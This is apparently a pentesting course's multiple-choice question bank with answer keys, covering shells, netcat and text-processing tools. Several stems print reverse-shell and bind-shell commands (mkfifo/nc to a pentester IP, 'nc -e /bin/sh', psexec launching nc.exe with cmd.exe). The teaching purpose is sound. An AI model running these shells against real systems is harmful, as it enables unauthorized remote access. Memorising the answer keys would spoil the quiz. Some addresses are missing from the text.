Penetration Testing & Network Defense


1 Penetration Testing & Network Defense
Basics/Preliminaries
Peer Instruction Questions for Cybersecurity: Pentesting by William E. Johnson, Allison Luzader, Irfan Ahmed is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

2 What is a shell?
A. A program that allows a user to display colorized output, clear and redraw the screen, etc.
B. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout)
C. A program that contains a terminal and is used to provide additional features to the terminal
D. An exploitation mechanism that allows code to inject itself into a running process
E. A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine)
Answer: B
Category: Shell vs. Term

3 What is a terminal?
A. A program that encapsulates a shell to provide more features such as colorized output and the ability to redraw the screen
B. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout)
C. A program that facilitates remote access between machines
D. A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine)
E. A program that allows remote termination of running processes
Answer: A
Category: Shell vs. Term

4 What does this pair of commands best accomplish?
mkfifo pipe
/bin/sh 0<pipe | nc [pentester IP] >pipe
A. Create a local netcat server that serves a bash instance
B. Run a shell script called “pipe” and serve it to a listener on the pentester’s IP
C. Redirect stdin and stdout of a bash instance to a listener on the pentester’s IP
D. Access stdin and stdout of a remotely running bash instance on the local pentester’s IP using a named pipe
Answer: C
Category: Simple proxy

5 You’ve established remote shell access to a machine with Netcat. Which of these commands will not function?
A. cat /etc/passwd
B. whoami
C. more /etc/passwd
D. hostname
E. id
Answer: C
Category: Shell vs. Term

6 You’ve established remote shell access to a machine with Netcat. Which of these commands will function?
A. more /etc/passwd
B. vim /etc/passwd
C. cat /etc/passwd
D. less /etc/passwd
E. top /etc/passwd
Answer: C
Category: Shell vs. term

7 You need terminal access to a remote machine to make use of a particular application. Assuming the machine has servers for each of these, which of these utilities will best provide that access?
A. Telnet
B. Netcat
C. tsh
D. SSH
E. A or D
Answer: D
Category: Shell vs. Term

8 What does this command accomplish?
C:\> for /L %%i in (1,1,255) do sc \\ %%i query
A. Attempt to connect with SMB to machines on /24 and list their running services in a command line
B. Attempt to connect with SMB to machines on /24 and list their open ports in a command line
C. Attempt to connect with SMB to machines on /24 and list their running services in a .bat script
D. Attempt to connect with SMB to machines on /24 and list their open ports in a .bat script
Answer: C
Maybe this is too much info, but key pieces of information are the variable with two “%%”s indicating this belongs to a script, and sc query queries services
Category: Remote access

9 What does this command best accomplish?
C:\> wmic /node: /user:administrator /password:password process list full
A. Send full process information to remote node
B. Receive full process information from node
C. Receive full process information for processes started by user “administrator” from
D. Send full process information for processes started by user “administrator” to
Answer: B
Source:
Category: Remote access

10 What does this command accomplish?
nc -v -w 2 137.30.126.111 750
A. Scan port 750 on
B. Open a bind shell on for 750 seconds
C. Access a Netcat listener at on port 750
D. Create a reverse shell and send to a remote listener at on port 750
Answer: A
Category: Port scanning

11 What does this command accomplish?
nc -e /bin/sh 137.30.126.111 750
A. Scan port 750 on
B. Open a bind shell on for 750 seconds
C. Access a Netcat listener at on port 750
D. Create a reverse shell and send to a remote listener at on port 750
Answer: D
Category: Reverse shell

12 What does the following command best accomplish. C:\> psexec \\137
What does the following command best accomplish?
C:\> psexec \\ -u myuser -p mypassword C:\nc.exe -l -p 1234 -e cmd.exe
A. Create a bind shell on the local Windows machine that requires a user login
B. Create a reverse shell on the local Windows machine that automatically logs into to provide the shell
C. Log in to and create a bind shell on
D. Log into a reverse shell that was provided to the local machine from
Answer: C
Category: Bind shell

13 You’re running this awk command against text output from a recon framework. What are the results?
awk -F"," '{print $1, $3, $4}' results.out
A. Insert commas after columns 1, 3, and 4 in the results file
B. Print columns 1, 3, and 4 of a CSV results file
C. Combine columns 1, 3, and 4 of each CSV file in the current directory and print output to results.out
D. Insert commas between columns 1, 3, and 4 and print those to results.out
Answer: B
Category: awk

14 You’re running this sed command against a plaintext file. What does it accomplish?
sed 's/,/\ /g' input.txt
A. Add a comma followed by a space between the first two tokens in the file
B. Add a comma followed by a space between each token in the file
C. Replace all spaces with commas in the file
D. Replace the first space with a comma in the file
E. Replace all commas with spaces in the file
Answer: E
Category: sed

15 What does this command accomplish?
grep 137.30.120.1 file.txt | sed 's/,/\ /g' | awk '{print $4}' > file_.txt
A. Run awk on file_.txt to isolate the 4th column, replace any extraneous commas with spaces, and only print lines that contain “ ”, saving to file.txt
B. Find lines in file.txt that contain “ ”, replace all commas with spaces, and then print the 4th column to file_.txt
C. Find file.txt on , replace all commas in the file with spaces, and print the fourth column out to file_.txt
D. Isolate the fourth column of file_.txt, replace extraneous commas with spaces, and save it to the found file.txt file on
Answer: B
Category: grep, awk, sed

16 Given a plaintext output file from a port scanner you’ve run, which of these tools will best help you find sections in the file based on some common pattern?
A. sed
B. awk
C. grep
D. bind
E. A and D
Answer: C
Category: grep

